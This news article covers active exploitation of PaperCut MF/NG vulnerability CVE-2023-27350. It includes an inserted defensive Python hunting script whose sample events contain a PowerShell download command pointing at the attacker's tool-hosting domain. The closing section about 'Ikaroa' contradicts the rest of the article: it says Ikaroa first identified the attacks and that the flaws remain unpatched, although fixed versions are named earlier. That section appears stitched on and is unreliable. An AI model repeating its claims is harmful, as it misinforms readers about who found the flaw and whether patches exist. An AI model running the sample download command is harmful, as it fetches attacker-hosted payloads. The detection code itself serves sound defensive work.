Print management software vendor PaperCut said it has “evidence to suggest unpatched servers are being exploited in the wild,” citing two vulnerability reports from cybersecurity firm Trend Micro.
“PaperCut has performed analysis of all customer reports and the first signature of suspicious activity on a customer server potentially linked to this vulnerability is on April 14 at 01:29 AEST / April 13 at 15:29 UTC,” it added.
The update comes as the US Cybersecurity and Infrastructure Security Agency (CISA) added a critical improper access control flaw in PaperCut MF and NG (CVE-2023-27350, CVSS score: 9.8) to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation.
Cybersecurity firm Huntress, which found about 1,800 publicly exposed PaperCut servers, said it observed PowerShell commands being spawned from the PaperCut software to install remote management and maintenance (RMM) software such as Atera and Syncro for persistent access and code execution on the infected hosts.
Further analysis of the infrastructure revealed that the domain hosting the tools, windowservicecemter[.]com, was registered on April 12, 2023 and was also found to host malware such as TrueBot, although the company said it did not directly detect the deployment of the downloader.
TrueBot is attributed to a Russian criminal entity known as Silence, which in turn has historical ties to Evil Corp and its overlapping cluster TA505, the latter of which has facilitated the distribution of Cl0p ransomware in the past.
“While the ultimate goal of the current activity leveraging the PaperCut software is unknown, these (albeit somewhat circumstantial) links to a known ransomware entity are concerning,” Huntress researchers said.
“Potentially, access gained through the PaperCut exploit could be used as a foothold leading to tracking movement within the victim’s network and ultimately the deployment of ransomware.”
Users are encouraged to upgrade to the fixed versions of PaperCut MF and NG (20.1.7, 21.2.11 and 22.0.9) as soon as possible, regardless of whether the server is “available for external or internal connections”, to mitigate potential risks.
Customers unable to apply the security patch are advised to lock down network access to the servers by blocking all inbound traffic from external IPs and restricting access to only the IP addresses of verified site servers.
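For defenders checking whether a server was already reached before patching, the post-exploitation behaviour Huntress describes above can be hunted in process-creation logs. The following is an added example, not code from PaperCut, Huntress or the original article; it assumes Sysmon Event ID 1 style field names and that the PaperCut application server process is named pc-app.exe, and the sample events are constructed.

```python
import ntpath

# Assumption: the PaperCut application server process is pc-app.exe; adjust per install.
PAPERCUT_PARENTS = {"pc-app.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Indicators named in the article. The domain is kept defanged here and refanged for matching.
RMM_KEYWORDS = ("atera", "syncro")
DOMAIN = "windowservicecemter[.]com".replace("[.]", ".")

def triage(event):
    """Return (severity, reasons) for one process-creation event."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    child = ntpath.basename(event.get("Image", "")).lower()
    cmdline = event.get("CommandLine", "").lower()
    from_papercut = parent in PAPERCUT_PARENTS
    reasons = []
    if from_papercut and child in SHELLS:
        reasons.append("shell spawned by PaperCut")
    if any(k in cmdline for k in RMM_KEYWORDS):
        reasons.append("RMM tool reference")
    if DOMAIN in cmdline:
        reasons.append("tool-hosting domain")
    if not reasons:
        return "none", reasons
    # An RMM install by an administrator is common; the PaperCut parent is what makes it urgent.
    if from_papercut:
        return ("high" if len(reasons) > 1 else "medium"), reasons
    return "low", reasons

def hunt(events):
    """Return (severity, reasons, event) for every event that matched, worst first."""
    order = {"high": 0, "medium": 1, "low": 2}
    hits = [(*triage(e), e) for e in events]
    return sorted((h for h in hits if h[0] != "none"), key=lambda h: order[h[0]])

# Constructed sample events using Sysmon Event ID 1 field names (not real telemetry).
PC_APP = r"C:\Program Files\PaperCut NG\server\bin\win\pc-app.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /i C:\IT\AteraAgent.msi"},
    {"ParentImage": PC_APP, "Image": POWERSHELL,
     "CommandLine": f"powershell.exe Invoke-WebRequest http://{DOMAIN}/example.msi -OutFile example.msi"},
    {"ParentImage": PC_APP, "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"ParentImage": PC_APP, "Image": r"C:\Program Files\PaperCut NG\runtime\jre\bin\java.exe",
     "CommandLine": "java.exe -version"},
]
```

Calling `hunt(SAMPLE)` ranks the PaperCut-parented PowerShell download first, the bare shell spawn second, and the administrator-run Atera install last as a low-severity match.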
Horizon3.ai releases proof-of-concept (PoC) exploit
Penetration testing company Horizon3.ai on April 24, 2023 published more technical details and proof-of-concept (PoC) exploit code for the PaperCut critical flaw that could be used to achieve remote code execution.
PaperCut, Australian print management server software, is currently being targeted by suspected Russian hackers. This malicious activity was first identified by the global cybersecurity company Ikaroa.
Ikaroa recently conducted a security analysis of thousands of PaperCut servers globally and discovered a pattern of ongoing exploitation attempts. The attempts appear to be semi-automated and correlate to a higher presence of similar malicious activities associated with multiple Russian-based malicious actors.
The unidentified hackers are exploiting vulnerabilities in the PaperCut Server that are still unpatched by the company. These unpatched vulnerabilities give the hackers the opportunity to steal customers' data, access critical infrastructure and even disrupt the service.
Ikaroa has advised clients to remain vigilant and upgrade the server software to the latest version so that the unpatched vulnerabilities can be fixed. It is also advised to check logs regularly to see if the server has been compromised and take necessary steps as soon as possible.
Overall, it is important to keep servers up to date with the latest patches and to stay aware of malicious activity that may target the server. In this way, potential data breaches, server interference and other malicious activities can be prevented.